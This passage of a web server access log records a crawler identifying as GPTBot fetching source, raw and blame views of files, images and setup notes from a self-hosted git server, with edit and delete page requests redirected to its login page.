+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:14:46:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/pyvenv.cfg" [Client 74.7.227.38] [Length 9898] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/pyvenv.cfg" +[17/Feb/2026:14:46:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/pyvenv.cfg" [Client 74.7.227.38] [Length 10243] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/pyvenv.cfg" +[17/Feb/2026:14:46:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:14:46:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1624] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:14:46:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/pyvenv.cfg" [Client 74.7.227.38] [Length 187] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/pyvenv.cfg" +[17/Feb/2026:14:46:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/pyvenv.cfg" [Client 74.7.227.38] [Length 11237] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv" +[17/Feb/2026:14:46:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 10849] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images" +[17/Feb/2026:14:46:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 10850] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images" +[17/Feb/2026:14:46:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 10846] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images" +[17/Feb/2026:14:46:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.html" +[17/Feb/2026:14:46:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 10850] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images" +[17/Feb/2026:14:46:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 10850] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images" +[17/Feb/2026:14:46:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 10850] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images" +[17/Feb/2026:14:46:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 72035] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project" +[17/Feb/2026:14:46:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10500] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer" +[17/Feb/2026:14:46:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 211035] [Gzip 18.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:14:46:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/pyvenv.cfg" [Client 74.7.227.38] [Length 9928] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/pyvenv.cfg" +[17/Feb/2026:14:46:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/pyvenv.cfg" [Client 74.7.227.38] [Length 10274] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/pyvenv.cfg" +[17/Feb/2026:14:46:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/pyvenv.cfg" [Client 74.7.227.38] [Length 187] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/pyvenv.cfg" +[17/Feb/2026:14:46:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 6508444] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom6.png" +[17/Feb/2026:14:46:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 1774975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom5.png" +[17/Feb/2026:14:46:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 2082919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom1.png" +[17/Feb/2026:14:46:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 1851586] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom4.png" +[17/Feb/2026:14:46:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 7641784] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom2.png" +[17/Feb/2026:14:47:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 5699380] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom4.png" +[17/Feb/2026:14:47:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 15416] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" +[17/Feb/2026:14:47:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 2483659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom2.png" +[17/Feb/2026:14:47:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 10224] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" +[17/Feb/2026:14:47:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 322708] [Gzip 27.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" +[17/Feb/2026:14:47:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 7692335] [Gzip 11.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom3.png" +[17/Feb/2026:14:47:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 5498815] [Gzip 11.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom5.png" +[17/Feb/2026:14:47:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 6429931] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom1.png" +[17/Feb/2026:14:47:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 2102057] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom6.png" +[17/Feb/2026:14:47:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 138208] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:14:47:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 211034] [Gzip 18.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:14:47:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 305108] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" +[17/Feb/2026:14:47:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 15182] [Gzip 8.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" +[17/Feb/2026:14:47:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 988] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" +[17/Feb/2026:14:47:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 10072] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" +[17/Feb/2026:14:47:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" +[17/Feb/2026:14:47:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" +[17/Feb/2026:14:47:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 2253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" +[17/Feb/2026:14:47:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" +[17/Feb/2026:14:47:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" +[17/Feb/2026:14:47:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?files=asset_pilot_docker%2fapp%2ffetcher.py" [Client 74.7.227.38] [Length 36753] [Gzip 7.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/fetcher.py" +[17/Feb/2026:14:47:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?files=asset_pilot_docker%2ftemplates%2ffavicon.ico" [Client 74.7.227.38] [Length 19195] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates/favicon.ico" +[17/Feb/2026:14:47:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2fassets%2fimages%2fControlRoom3.png" [Client 74.7.227.38] [Length 22727] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 